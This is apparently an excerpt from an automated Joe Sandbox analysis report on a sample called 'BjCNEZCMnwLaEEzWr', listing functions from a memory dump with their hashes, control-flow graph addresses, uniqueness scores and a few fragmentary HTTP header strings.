                                                                                                                                                                • Opcode ID: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction ID: df38b710035ab107180ab5fabf918666e4e51519f8213ed40d1107e97c8c31fa
                                                                                                                                                                • Opcode Fuzzy Hash: e6710b313372bdb89baaa3f3abf609e97fcf4defd94341f28ea73213f73bc76a
                                                                                                                                                                • Instruction Fuzzy Hash: B921AE31944226AFEF219E78C944B9DBBB6AF04304F058215F959BF595D730A904CB94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02E214DE Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 70 2e214de-2e21590 call 2e23653 call 2e20c9c call 2e21345 * 6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002D.00000002.2922419078.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_45_2_2e20000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                • Instruction ID: 537142da9b7bbe654f42e68328461c40e5dc95652363eacbcbc8767b74ea729b
                                                                                                                                                                • Opcode Fuzzy Hash: 7414966d62ab92a52d97edb7ada7e3a23f2d9defc7b5a2a9815f1829eca1fdf5
                                                                                                                                                                • Instruction Fuzzy Hash: 64118F724045249EEF03AF60C5C8CAA73EDEE40704B45596AAD8AEF449FE709258CEE5
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02E23F0D Relevance: .0, Instructions: 26COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 88 2e23f0d-2e23f29 call 2e23653 call 2e2379f 93 2e23f3b-2e23f66 call 2e23f78 * 3 88->93 94 2e23f2b-2e23f39 call 2e2401b 88->94 107 2e23f71 93->107 102 2e23f76-2e23f77 94->102 107->102 108 2e23f71 call 2e23f78 107->108 108->102
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002D.00000002.2922419078.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_45_2_2e20000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID:
                                                                                                                                                                • Opcode ID: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                • Instruction ID: 6681177559a651a0f3cf1cce2d0bd403be243871ab58b038698f7d4d225eb30e
                                                                                                                                                                • Opcode Fuzzy Hash: 8c09feb9db596d8359f295e8d139cc18023a08d38d10f5a63b4ad8fb083c8443
                                                                                                                                                                • Instruction Fuzzy Hash: 78F082705C8260A6FF00BB71AC4969933B96F00305F04A1D0B94BAD0D0CE3885588E71
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Non-executed Functions

                                                                                                                                                                Function 02E24674 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 109 2e24674-2e2468d call 2e23a1c 112 2e2468f-2e24698 call 2e23a6e 109->112 113 2e2469d-2e246cd 109->113 112->113 116 2e246d3-2e246f5 113->116 117 2e247e7-2e247ec 113->117 116->117 119 2e246fb-2e24720 116->119 121 2e24722-2e24737 119->121 122 2e24738-2e2475a 119->122 121->122 124 2e247bf-2e247c9 122->124 125 2e2475c-2e2477e 122->125 126 2e247e0-2e247e5 124->126 127 2e247cb-2e247dd call 2e23673 124->127 125->124 130 2e24780-2e247a2 125->130 126->117 127->126 130->124 133 2e247a4-2e247bc 130->133 133->124
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002D.00000002.2922419078.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_45_2_2e20000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction ID: c3273d7f151abcf85100dcb4138bf1f163300c2eb8381fbf5e4bb458663fd5fe
                                                                                                                                                                • Opcode Fuzzy Hash: 2b93bd9568e5da8988b8e1df8da560840dd12be90571bd433eb3dce17dfd8eb8
                                                                                                                                                                • Instruction Fuzzy Hash: 304162B6600218BFEF129F65CC44BDEBBBAEF80708F154069EA45AA294D734D644CF94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Function 02E24675 Relevance: 6.4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                Download Yara Rule

                                                                                                                                                                Control-flow Graph

                                                                                                                                                                • Executed
                                                                                                                                                                • Not Executed
                                                                                                                                                                control_flow_graph 134 2e24675-2e24680 135 2e2468b-2e2468d 134->135 136 2e24686 call 2e23a1c 134->136 137 2e2468f-2e24698 call 2e23a6e 135->137 138 2e2469d-2e246cd 135->138 136->135 137->138 141 2e246d3-2e246f5 138->141 142 2e247e7-2e247ec 138->142 141->142 144 2e246fb-2e24720 141->144 146 2e24722-2e24737 144->146 147 2e24738-2e2475a 144->147 146->147 149 2e247bf-2e247c9 147->149 150 2e2475c-2e2477e 147->150 151 2e247e0-2e247e5 149->151 152 2e247cb-2e247dd call 2e23673 149->152 150->149 155 2e24780-2e247a2 150->155 151->142 152->151 155->149 158 2e247a4-2e247bc 155->158 158->149
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 0000002D.00000002.2922419078.0000000002E20000.00000040.00000001.00020000.00000000.sdmp, Offset: 02E20000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_45_2_2e20000_BjCNEZCMnwLaEEzWr.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: -Age$Cook$User$ie: $nt:
                                                                                                                                                                • API String ID: 0-2052191038
                                                                                                                                                                • Opcode ID: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction ID: d2a5899016b24c9aa85d79146bdda4f20699b1245d5bc33acb8208cbe46b3611
                                                                                                                                                                • Opcode Fuzzy Hash: 21bbdfff56fab31c03729283b2ea7a1e7782b6cd8000812816065b0b8d19ca46
                                                                                                                                                                • Instruction Fuzzy Hash: 154184B6600218BFEF125F65CC48BDEBFBAEF80708F154069EA45AA294D734D644CF94
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%